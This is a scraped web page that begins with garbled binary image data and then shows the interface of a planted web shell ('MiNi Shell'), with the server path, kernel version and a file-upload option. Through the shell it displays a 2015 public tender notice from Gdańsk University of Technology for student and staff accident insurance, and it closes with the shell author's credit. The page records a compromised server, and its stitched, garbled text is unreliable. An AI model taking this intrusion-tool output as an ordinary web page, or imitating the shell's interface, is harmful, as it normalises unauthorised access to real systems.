JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151208/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151208/334800-N-2015.html

<p class="kh_header"><b>Gdańsk: Usługa zapewnienia ochrony ubezpieczeniowej następstw nieszczęśliwych wypadków studentów, doktorantów i pracowników Politechniki Gdańskiej, a także ich rodzin oraz osób towarzyszących wyjeżdżających na praktyki, służbowo oraz na wypoczynek organizowany przez Politechnikę Gdańską</b><br>
<b>Numer ogłoszenia: 334800 - 2015; data zamieszczenia: 08.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Gdańska , ul. Narutowicza 11/12, 80-233 Gdańsk, woj. pomorskie, tel. 58 3472400, faks 58 3472913.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pg.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa zapewnienia ochrony ubezpieczeniowej następstw nieszczęśliwych wypadków studentów, doktorantów i pracowników Politechniki Gdańskiej, a także ich rodzin oraz osób towarzyszących wyjeżdżających na praktyki, służbowo oraz na wypoczynek organizowany przez Politechnikę Gdańską.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zapewnienie ochrony ubezpieczeniowej w formie okresowych (1-, 7-, 21-, 28-, 42-dniowych) pakietów ubezpieczeniowych w okresie od dnia 01.01.2016 roku do dnia 31.03.2018 roku, z tym że Zamawiający podpisze z Wykonawcą umowę na okres od dnia 01.01.2016 roku do dnia 31.12.2017 roku. Okres od dnia 01.01.2018 roku do dnia 31.03.2018 roku dotyczyć będzie ochrony ubezpieczeniowej udzielanej ubezpieczonym, którzy wnioskowali o tę ochronę najpóźniej w ostatnim dniu trwania umowy (31.12.2017) na okres 3 miesięcy, tj. do dnia 31.03.2018 roku.
2. Zamówienie dotyczy ubezpieczenia Następstw Nieszczęśliwych Wypadków studentów, doktorantów i pracowników Zamawiającego, a także ich rodzin oraz osób towarzyszących (w tym małoletnich), wyjeżdżających na praktyki, służbowo oraz na wypoczynek organizowany przez Zamawiającego na terenie Polski. 
3.	Wymagania stałe:
3.1.	zapewnienie obsługi w formie umowy potwierdzonej polisą grupową z kwartalnym trybem jej rozliczania na podstawie:
a)	faktycznej liczby zgłoszonych okresowych (1-, 7-, 21-, 28- i 42-dniowych) pakietów ubezpieczenia (osobodni) przez osoby wyjeżdżające, zwanych w dalszej części pakietem,
b)	wysłanych Wykonawcy, nie później niż w dniu wyjazdu, Zgłoszeń do ubezpieczenia z podaniem imienia, nazwiska, numeru PESEL osób wyjeżdżających, daty wyjazdu i numeru pakietu oraz miejsca wyjazdu; 
3.2.	pakiety:
a)	pakiet 1 - wyjazd 1-dniowy,
b)	pakiet 7 - wyjazd do 7 dni włącznie,
c)	pakiet 21 - wyjazd do 21 dni włącznie,
d)	pakiet 28 - wyjazd do 28 dni włącznie 
e)	pakiet 42 - wyjazd do 42 dni włącznie;
3.3.	przekazywanie Wykonawcy Zgłoszeń do ubezpieczenia: 
a)	Zgłoszenia do ubezpieczenia przekazywane będą Wykonawcy w formie elektronicznej na adres poczty elektronicznej (e-mail) podanej Zamawiającemu w formularzu Oferty (wzór Zgłoszenia do ubezpieczenia stanowi załącznik nr 3 do wzoru umowy); w szczególnych sytuacjach Zamawiający będzie przekazywać Wykonawcy Zgłoszenie do ubezpieczenia w formie faksu na numer podany Zamawiającemu w formularzu Oferty,
b)	zgłoszenia będą wysyłane w formie zbiorczej, z dołączoną listą/wykazem wszystkich ubezpieczonych osób dla danego wyjazdu; w szczególnych sytuacjach zgłoszenia wysyłane będą oddzielnie dla każdego ubezpieczonego, 
c)	wysłanie Zgłoszenia do ubezpieczenia na adres poczty elektronicznej (e-mail) lub numer faksu Wykonawcy będzie równoznaczne z jego przyjęciem przez Wykonawcę;
3.4.	wynagrodzenie:
a)	wynagrodzenie - wyliczona składka za wszystkie otrzymane Zgłoszenia do ubezpieczenia w danym kwartale - realizowane będzie w ciągu 21 dni po otrzymaniu rachunku/faktury/rozliczenia/aneksu, który Wykonawca przekazywać będzie Zamawiającemu w ciągu 15 dni po zakończeniu kwartału, 
b)	podstawą do wyliczenia wynagrodzenia - składki - będzie faktyczna liczba zgłoszonych okresowych pakietów ubezpieczeniowych przez osoby wyjeżdżające przemnożona przez stawkę za pakiet zaproponowaną przez Wykonawcę w Ofercie.

4.	Zakres przedmiotu zamówienia - obligatoryjny:
4.1.	ubezpieczony: studenci, doktoranci i pracownicy Zamawiającego, a także ich rodziny, osoby towarzyszące, w tym małoletnie;
4.2.	wyjazd: wyjazdy na praktyki, staże, służbowe oraz na wypoczynek organizowany przez Zamawiającego. W szczególności są to: wyjazdy naukowe, dydaktyczne, praktyki i wycieczki szkoleniowe, wycieczki turystyczne, wczasy i inne formy organizowania wolnego czasu ubezpieczonym przez Zamawiającego;
4.3.	przedmiot ubezpieczenia: następstwa nieszczęśliwych wypadków polegające na uszkodzeniu ciała lub rozstroju zdrowia, powodujące uszczerbek na zdrowiu oraz śmierć ubezpieczonego, a w szczególności:
a)	śmierć ubezpieczonego (100% sumy ubezpieczenia),
b)	trwałe inwalidztwo całkowite (do 100% sumy ubezpieczenia),
c)	trwały uszczerbek na zdrowiu (do 100% sumy ubezpieczenia),
d)	częściowy uszczerbek na zdrowiu (1% sumy ubezpieczenia za 1% uszczerbku na zdrowiu),
e)	zawały serca i wylewy krwi do mózgu traktowane są jako następstwa nieszczęśliwego wypadku;
4.4.	zakres terytorialny: 	teren Polski;
4.5.	zakres czasowy: 	ubezpieczenie całodobowe;
4.6.	suma ubezpieczenia: 10 000 zł.
5.	Zakres przedmiotu - klauzule dodatkowe - fakultatywne
5.1. KLAUZULA NR 1 - Zwrot kosztów leczenia  - za koszty leczenia uważa się zalecone przez lekarza, udokumentowane i związane z nieszczęśliwym wypadkiem koszty poniesione przez Ubezpieczonego na terytorium Rzeczypospolitej Polskiej z tytułu:
- udzielenia doraźnej pomocy lekarskiej lub ambulatoryjnej;
- badań, pobytu w szpitalu, zabiegów ambulatoryjnych i operacji;
- nabycia niezbędnych lekarstw i środków opatrunkowych przepisanych przez lekarza;
Zwrot kosztów leczenia wynosi maksymalnie 10% SU.
5.2. KLAUZULA NR 2 - Świadczenie szpitalne  - świadczenie szpitalne przysługuje Ubezpieczonemu za udokumentowany okres pobytu w szpitalu, jeżeli Ubezpieczony musiał poddać się leczeniu, na podstawie skierowania lekarza specjalisty, w związku z nieszczęśliwym wypadkiem. 
- dzienne świadczenie szpitalne wynosi 1% SU za każdy dzień pobytu w szpitalu
- wypłata świadczenia przysługuje od 5 dnia pobytu w szpitalu, maksymalnie przez 30 dni. 
5.3. KLAUZULA NR 3 - Zasiłek z tytułu niezdolności do nauki lub pracy - wypłacany jednorazowo w wysokości 2% SU, jeżeli okres niezdolności do nauki lub pracy przekroczył 31 dni.
6.	Zamawiający wymaga, aby na czas trwania umowy ze strony Wykonawcy został wyznaczony koordynator do realizacji zamówienia oraz kontaktów z Zamawiającym.
7.	Informacje dodatkowe:
Dotychczasowa realizacji i szkodowość:
a) w roku 2004/2005 zrealizowano ponad 71 000 osobodni (około 3600 studentów i pracowników) dla wyjazdów na terenie Polski,
b) w roku 2005/2006 zrealizowano ponad 65 000 osobodni dla wyjazdów na terenie Polski,
c) w roku 2006/2007 (okres od października 2006 do sierpnia 2007) zrealizowano ponad 97 500 osobodni dla wyjazdów na terenie Polski.
W tym czasie zgłoszono jedną szkodę - kwota wypłaty: 300 zł,
d) w latach 2008/2009 zrealizowano 184 160 osobodni. 
W tym czasie zgłoszono 2 szkody - kwota wypłat: 350 zł,
e) w roku 2010 zrealizowano 109 570 osobodni, a w roku 2011 155 075 osobodni.
Zgłoszono 1 szkodę - kwota wypłaty: 200 zł,
f) w roku 2012 zrealizowano 66 504 osobodni, a w roku 2013 130 701 osobodni. 
Nie zgłaszano żadnych szkód;
g) w roku 2014 zrealizowano 154 399 osobodni w tym:
pakiet 1 -    8 337,
pakiet 7 -   2 137,
pakiet 21 - 1 241,
pakiet 42 - 2 501.
Nie zgłoszono żadnej szkody.

8.	Szacunek liczby pakietów:
8.1 Zamawiający szacuje, iż w okresie obowiązywania umowy liczba zrealizowanych pakietów ubezpieczenia kształtować się będzie następująco:
a) pakiet 1 - 17 000,
b) pakiet 7 -   5 000,
c) pakiet 21 - 5 000,
d) pakiet 28 - 4 200,
e) pakiet 42 - 2 200;
8.2. wyżej określone szacunki nie są wiążące dla Zamawiającego przy realizacji umowy, niemniej są podstawą dla Wykonawcy do sporządzenia oferty. Rzeczywiste liczby wynikać będą z bieżącego zapotrzebowania Zamawiającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem przystąpienia do przetargu jest wniesienie przed upływem terminu składania ofert, wadium w wysokości dla:  800,00 zł
2. Wadium może być wniesione w jednej lub kilku następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
3.	Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego nr 64 1160 2202 0000 0001 8607 3782, Bank Millenium S.A. O/Gdańsk, z dopiskiem:
     WADIUM - ubezpieczenie NNW studentów, doktorantów i pracowników PG  ZP/ 399/055/U/15
Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego.
4.	Wniesienie wadium w jednej z form określonych w pkt. 2 ppkt b). - e). następuje poprzez doręczenie za pokwitowaniem oryginału dokumentów w Kwesturze Politechniki Gdańskiej - I piętro Gmach Główny skrzydło B, ul. G. Narutowicza 11/12 w dniach od poniedziałku do piątku w godzinach od 900 do 1300 lub przesłanie pocztą na adres Kwestura Politechniki Gdańskiej, ul. G. Narutowicza 11/12, 80-233 Gdańsk. Kopię pokwitowania wniesienia wadium należy załączyć do oferty.
5.	Wykonawca składa wraz z ofertą potwierdzenie przelewu lub jego kserokopię potwierdzoną za zgodność z oryginałem.
6.	W przypadku wniesienia wadium w formie gwarancji bankowej bądź gwarancji ubezpieczeniowej, gwarancja ta musi być bezwarunkowa i nieodwołalna, płatna na każde wezwanie oraz obejmować wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a i 5 Ustawy Pzp, a także musi obejmować cały okres związania ofertą określony w SIWZ. W przypadku poręczeń muszą one gwarantować płatność na każde wezwanie Zamawiającego i oraz obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę. W przypadku, gdy nie będzie spełniony którykolwiek ze wskazanych powyżej wymogów, Zamawiający uzna, że wadium nie zostało wniesione i wykluczy wykonawcę z udziału w postępowaniu. 
7.	Wycofanie oferty przed upływem terminu składania ofert nie powoduje utraty wadium. 
8.	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 46 Ustawy Pzp. 
9.	Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana, jako najkorzystniejsza. Wykonawca wnosi wówczas wadium w terminie określonym przez Zamawiającego. 
10.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. 
11.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówi podpisania umowy w sprawie niniejszego zamówienia publicznego na warunkach określonych w ofercie;
b)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że posiada zezwolenie na wykonywanie działalności ubezpieczeniowej w myśl Ustawy o działalności ubezpieczeniowej z dnia 22 maja 2003 r. (t.j. Dz. U. z 2015 poz. 1206 z późn. zm.)lub jest uprawniony do uczestnictwa w obrocie prawnym na podstawie odrębnych przepisów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia (załącznik nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty	załącznik nr 1,
2. Formularz rzeczowo-cenowy Załącznik nr 2, 
3 Opcjonalnie-Pełnomocnictwo dla osoby reprezentującej w niniejszym postępowaniu Wykonawcę lub pełnomocnictwo dla osoby lub podmiotu reprezentującego kilku Wykonawców składających ofertę wspólną	
4 Opcjonalnie - pisemne zobowiązanie podmiotu trzeciego do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. 	
5. Kopia potwierdzenia wniesienia wadium - dokument zalecany do załączenia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - 4.	Wprowadzenie do oferty klauzul dodatkowych - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>5.	Zamawiający w oparciu o art. 144 ust 1 ustawy pzp przewiduje możliwość dokonania następujących istotnych zmian w zawartej umowie w sprawie niniejszego zamówienia publicznego, określając jednocześnie warunki ich wprowadzenia: 
a.	W przypadku zmiany obowiązujących na terenie Rzeczypospolitej Polskiej przepisów dotyczących wysokości stawek podatku od towarów i usług (VAT) w zakresie obejmującym przedmiot niniejszego zamówienia, Zamawiający dopuszcza możliwość odpowiedniej zmiany w tym zakresie;
b.	zmiany nazw i innych danych identyfikacyjnych stron umowy;
c.	wystąpienia zdarzeń siły wyższej (zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia), w szczególności: klęski żywiołowej, huraganu, powodzi, katastrofy transportowej, pożaru, eksplozji, wojny, strajku i innych nadzwyczajnych wydarzeń, których zaistnienie leży poza zasięgiem i kontrolą stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzp.pg.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Gdańska, 
Dział Zamówień Publicznych, 
Gmach Główny skrzydło B pok. 212,
ul. G. Narutowicza 11/12, 80-233 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2015 godzina 09:45, miejsce: Politechnika Gdańska, 
Dział Zamówień Publicznych, 
Gmach Główny skrzydło B pok. 212,
ul. G. Narutowicza 11/12, 80-233 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nr postępowania: ZP/399/055/U/15
5.	Otwarcie ofert nastąpi w dniu 16.12.2015 r. o godz. 10.15  w siedzibie Zamawiającego: Politechnika Gdańska, 80-233 Gdańsk ul. G. Narutowicza 11/12, Gmach Główny skrzydło B, sala 212..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com